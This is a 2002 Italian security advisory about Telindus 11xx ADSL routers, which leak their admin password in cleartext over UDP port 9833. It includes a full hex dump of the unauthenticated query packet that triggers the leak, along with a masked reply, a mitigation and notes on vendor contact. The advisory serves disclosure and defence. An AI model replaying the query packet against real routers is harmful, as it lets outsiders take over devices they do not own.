:::Titolo::: Alcune vulnerabilita` nei router ADSL Telindus 11xx di finelli@ieee.org, kurgan@tigerteam.it :::AGGIORNAMENTI (28/6/2002)::: Tutti i prodotti Telindus che utilizzano il medesimo software di amministrazione dei router 11xx sono vulnerabili. Telindus Italia ci ha fornito un nuovo firmware (beta) e un nuovo programma di amministrazione remota che usano un sistema diverso per l'autenticazione. Non li abbiamo collaudati, ma dovrebbero risolvere il problema. Questo software non e` ancora stato rilasciato pubblicamente, ma se vi serve potete richiedercelo per email. Questo software e il relativo firmware NON E` COPERTO DA GARANZIA ALCUNA ne` da parte di TigerTeam ne` da parte di Telindus, naturalmente. Inoltre ci preme ricordarvi che se il vostro router e` in comodato, e non e` di vostra proprieta`, non potete aggiornarlo senza il consenso del proprietario. Abbiamo saputo che Telindus ha prodotto una nuova serie di router che, sebbene abbiano la stessa sigla dei vecchi 11xx, sono totalmente diversi nell' hardware e nel firmware, e non dovrebbero soffrire del problema descritto in questo advisory. Questi nuovi routers dispongono di una interfaccia web per l'amministrazione, e sono di forma rettangolare anziche` quadrata. A quanto sappiamo al momento non sono ancora in vendita in Italia, sebbene lo siano gia` in altri paesi. :::Abstract::: La serie 11xx dei router Telindus (http://www.telindus.com) ha un problema di sicurezza estremamente grave, sfruttabile da remoto. Esso nasce dal fatto che e` possibile comportarsi come un programma di amministrazione remota, che e` in grado di accedre al router senza che sia conosciuta la password. :::Il Problema::: I router Telindus della serie 11xx hanno un programma di amministrazione, per Windows, liberamente disponibile dallo stesso sito del venditore, che permette di amministrare i router. Il programma cerca di scoprire i router presenti nella LAN attraverso un broadcast UDP. Successivamente viene spedito un pacchetto UDP unicast alle macchine che hanno risposto al broadcast: in risposta a tale richiesta il router replica con un pacchetto UDP che contiene, fra gli altri il numero di revisione del software, il nome del router e la password. Tutte le informazioni passano in chiaro sulla porta UDP 9833. E` chiaramente possibile sfruttare questo comportamento in mille modi: su una LAN e` sufficiente scaricarsi lo strumento di amministrazione e sniffare il traffico. Su una WAN e` invece necessario (e sufficiente) forgiare un pacchetto che faccia la query al router. Come esempio, questo e` il dump completo (con Ethernet frame) di un pacchetto di richiesta. Il payload e` negli ultimi 62 bytes, partendo da ``19 73 04'', l'indirizzo del mittente e` 172.16.0.16 e quello del router (destinatario) e` 172.16.0.253: 00 60 6C 1D BD 7E 00 00 86 60 62 F7 08 00 45 00 00 52 01 52 00 00 80 11 E0 1B AC 10 00 10 AC 10 00 FD 26 69 26 69 00 3E A8 DA 19 73 04 17 73 30 00 01 00 01 01 00 01 01 01 02 01 33 01 13 01 16 04 08 04 15 01 0D 01 0E 01 14 40 03 40 04 01 26 01 27 01 28 01 30 01 44 42 05 42 22 04 18 FF FF Questo e` il dump di un pacchetto di risposta (con Ethernet frame). Il payload e` negli ultimi 204 bytes, partendo da ``19 73 04''. La password e` stata rimpiazzata da ``x'' 00 00 86 60 62 F7 00 60 6C 1D BD 7E 08 00 45 00 00 E0 25 9D 00 00 63 11 D8 42 AC 10 00 FD AC 10 00 10 26 69 26 69 00 CC 00 00 19 73 04 17 73 30 00 03 00 01 01 00 00 05 45 51 43 41 59 01 01 00 0D xx xx xx xx xx xx xx xx xx xx xx xx xx 01 02 00 32 4E 44 31 30 36 30 56 45 2D 54 4C 49 2C 20 76 65 72 20 35 2E 33 2E 31 31 42 3B 54 68 75 20 44 65 63 20 20 36 20 31 36 3A 33 36 3A 33 33 20 32 30 30 31 01 33 00 02 00 3C 01 13 00 06 00 60 6C 1D BD 7E 01 16 00 06 00 00 86 60 62 F7 04 08 00 02 00 01 04 15 00 02 00 FF 01 0D 00 04 00 00 00 00 01 0E 00 04 00 00 00 00 01 14 00 02 00 00 40 03 00 02 00 00 40 04 00 02 00 00 01 26 00 00 01 27 00 00 01 28 00 00 01 30 00 02 00 02 01 44 00 00 42 05 00 00 42 22 00 00 04 18 00 00 :::La Soluzione::: Noi non siamo stati in grado di capire se questa ``funzionalita` '' e` disabilitabile. Altrimenti sembra che l'unica soluzione sia il filtraggio del traffico sulla porta UDP 9833 diretto al router. Una soluzione spiccia consiste nel redirigere il traffico WAN verso la porta 9833/udp a un altro --- meglio se inutilizzato --- indirzzo IP. Tale risultato puo' essere raggiunto facendo telnet sul router, loggandosi (alla luce di quanto sopra non dovrebbero esserci difficolta` in questa operazione) e dando il comando ``add auto udp 9833 9833 9833 10.0.0.10'' dove 10.0.0.10 e` un indirzzo inutiliizato della LAN. In tal modo si stabilisce una regola statica che ridirige il traffico proveniente dall'interfaccia WAN. A quesato punto e` necessario dare il comando ``save''. Il comando ``show auto'' dovrebbe mostarare lo stato della tabella. In caso di errore il comando ``del auto ' cancella la regola. Possono ovviamente prevedersi altri escamotage. :::Note::: Abbiamo contattato la Telindus attraverso il loro ufficio italiano un mese fa: a seguito della nostra segnalazione stanno lavorando su questo problema e una patch (sotto forma di nuovo firmware) dovrebbe essere disponibile a breve. Si noti infine che il banner del router mostra la dicitura Arescom, quindi forse anche questi ultimi sono vulnerabili, ma non siamo stati in grado di verificarlo. :::Ringraziamenti::: Il permesso di copiare o pubblicare il presente documento e` garantito finche` la seguente nota appaia intatta: (C) 2002 finelli@ieee.org, kurgan@tigerteam.it Il documento e` reperibile alle URL: http://www.tigerteam.it http://www.trustnet.it :::Disclaimer (USA and other countries)::: Strangely enough we have been able to discover this problem in spite of DMCA and similar initiatives, since we did not even need to reverse engineer the code of any application: we were simply monitoring the network for totally unrelated issues and we happened to log a ``strange communication'' on the UDP port 9833. Notice that the payload is in clear text and that the juxtaposition of the router name and of a text string leaves little to imagination. NO WARRANTY This document is furnished on an "as is" basis. We make no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. We do not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.